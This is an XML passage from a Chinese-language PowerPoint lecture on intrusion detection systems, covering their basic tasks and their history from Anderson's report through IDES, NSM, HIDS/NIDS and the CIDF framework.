              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201721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aike.baidu.com/view/17495.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448C87-023D-4E49-B603-34FECE4E8D7D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178929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为了能够实现上述功能，入侵检测系统通常需要能够执行以下的主要任务：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、能够监视、分析用户和系统的活动；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、能够跟踪、分析网络数据流量。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、能够实现数据文件的完整性检查，以便于发现关键数据文件是否被篡改等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这些任务是一个入侵检测系统需要执行的最基本的任务，它们为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>识别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击行为提供最基础的素材。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同时，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵检测系统还需要分析已知攻击的特征并构建特征库，以识别网络系统中的已知攻击行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为了提高系统的安全防护能力，入侵检测系统还需要针对合法用户的正常行为模式进行建模，以识别一些异常行为。</a:t>
            </a:r>
          </a:p>
          <a:p>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其实，人们对入侵检测技术的研究历史并不长。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>上世纪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年代初，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>James P. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Aderson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为美国空军做了一份题为《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Computer Security  Monitoring and Surveillance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>》（计算机安全威胁监控与监视）的技术报告。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>该报告第一次详细阐述了入侵检测的概念。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>将计算机系统面临的安全威胁分类为内部渗透、外部渗透和不法行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>并且针对上述三类安全威胁，提出了利用审计跟踪数据监视入侵活动的思想。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1984</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1986</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>乔治敦大学研制出了一个实时入侵检测系统模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>—IDES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（入侵检测专家系统）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这是第一个在一个应用中运用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>统计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于规则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>两种技术的系统，使用统计分析方法检测异常入侵行为，同时还有一个专家系统检测模块对已知入侵模式进行检测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是入侵检测研究中最有影响的一个系统。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>该系统使用计算机系统的审计数据作为对系统行为识别的依据，由于异构计算机系统的审计数据格式的并不一致，因此在对系统行为识别之前必须花费大量的资源对设计数据格式进行统一。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1990</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，加州大学戴维斯分校开发出了网络安全监控系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Network Security Monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NSM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>该系统通过捕获</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分组，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第一次直接将网络数据流作为审计数据来源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，因而可以在不将审计数据转换成统一格式的情况下监控异构主机的行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>至此，入侵检测发展的历史正式翻开了新的一页，形成了两大阵营：基于主机的入侵检测系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）和基于网络的入侵检测系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>此后出现了各种入侵检测系统，比如开源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NFR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ISS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RealSecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接着，研究者为了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使入侵检测的研究项目之间能够共享信息和资源，同时入侵检测组件也能够在其它系统中再利用，开始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>致力于为入侵检测系统建议一套标准，开发一些协议和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（应用程序接口）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年，人们提出了通用入侵检测框架（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主要做了四个方面的工作：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和NIDES的基础上提出了一个通用模型，将入侵检测系统分为四个基本组件，即事件产生器，事件分析器，响应单元和事件数据库；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、构建了入侵检测系统的通信机制，定义了入侵检测系统与其他网络安全设备以及系统内部各组件的通信标准；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、为了实现软件复用以及入侵检测与响应组件之间的互操作性，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>定义了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>公共入侵规范语言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，用来描述入侵检测组件之间传送的消息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、定义并开发了一套应用程序接口（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），程序员可以在不了解编码和传递过程具体细节的情况下，以一种简单的方式构建和传递统一入侵检测对象（GID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>规范的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>可以共享检测信息，相互通信，协同工作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>主要作用在于集成各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>使之协同工作，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>实现各</a:t>
            </a:r>
            <a:r>
